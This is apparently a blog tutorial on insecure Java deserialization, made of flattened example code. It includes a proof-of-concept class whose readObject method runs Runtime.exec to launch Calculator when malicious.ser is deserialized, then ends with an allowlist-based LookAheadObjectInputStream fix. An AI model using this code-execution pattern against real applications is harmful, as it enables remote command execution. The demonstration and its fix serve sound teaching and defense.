Understanding Java De-serialization

So, What is Deserilization?

Demo Time

public class Employee implements java.io.Serializable {public String name;public String address;public transient int SSN;public int number;public void mailCheck() {System.out.println(“Mailing a check to “ + name + “ “ + address);}}
import java.io.*;public class SerializeDemo {public static void main(String [] args) {Employee e = new Employee();e.name = "Reyan Ali";e.address = "Phokka Kuan, Ambehta Peer";e.SSN = 11122333;e.number = 101;try {FileOutputStream fileOut =new FileOutputStream("/tmp/employee.ser");ObjectOutputStream out = new ObjectOutputStream(fileOut);out.writeObject(e); //Serialization done hereout.close();fileOut.close();System.out.printf("Serialized data is saved in /tmp/employee.ser");} catch (IOException i) {i.printStackTrace();}}}
Serialization code gets executed
Content of employee.ser
Base64 serialized data
import java.io.*;import java.net.URL;import java.net.URLClassLoader;
public class DeserializeDemo {public static void main(String [] args) {Employee e = null;try {FileInputStream fileIn = new FileInputStream("/tmp/employee.ser");ObjectInputStream in = new ObjectInputStream(fileIn);e = (Employee) in.readObject(); //Deserialization done herein.close();fileIn.close();} catch (IOException i) {i.printStackTrace();return;} catch (ClassNotFoundException c) {System.out.println("Employee class not found");c.printStackTrace();return;}e.mailCheck();System.out.println("Deserialized Employee...");System.out.println("Name: " + e.name);System.out.println("Address: " + e.address);System.out.println("SSN: " + e.SSN);System.out.println("Number: " + e.number);}}
e = (Employee) in.readObject();
Deserialization code gets executed
import java.io.IOException;public class ExploitDeser implements java.io.Serializable{private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{in.defaultReadObject();Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");}}
import java.io.*;public class SerializeDemo {public static void main(String [] args) {ExploitDeser e=new ExploitDeser();try {FileOutputStream fileOut =new FileOutputStream("/tmp/malicious.ser");ObjectOutputStream out = new ObjectOutputStream(fileOut);out.writeObject(e);out.close();fileOut.close();System.out.printf("Serialized data is saved in /tmp/malicious.ser");} catch (IOException i) {i.printStackTrace();}}}
Provided malicious.ser as input to the DeserializeDemo class
Calculator Pops up

Remediation

class LookAheadObjectInputStream extends ObjectInputStream {public LookAheadObjectInputStream(InputStream inputStream)throws IOException {super(inputStream);}@Overrideprotected Class<?> resolveClass(ObjectStreamClass desc) throws IOException,ClassNotFoundException {if (!desc.getName().equals(Employee.class.getName())) {throw new InvalidClassException("Unauthorized deserialization attempt",desc.getName());}return super.resolveClass(desc);}}
if (!desc.getName().equals(Employee.class.getName())) {
Modified DeserializeDemo class
Error in execution of serialized data of custom class

References:

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Arduino & Processing

Building the RaspberryPi Christmas Light Box

Coroutines in Python for Data Engineering (0)

How To Improve Incident Routing With Cloudaware CMDB and PagerDuty

Automatically freeing heap memory in C

The Blind Spots You’re Missing with Synthetic Monitoring

“What is data Data Reliability?”

How to install Flutter on Windows?

How to install Flutter on Windows?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Swapneil Kumar Dash

Swapneil Kumar Dash

More from Medium

Java Annotations

Add Superscript and Subscript to PowerPoint Using Java

JAVA & Git-Hub

QUEUES in JAVA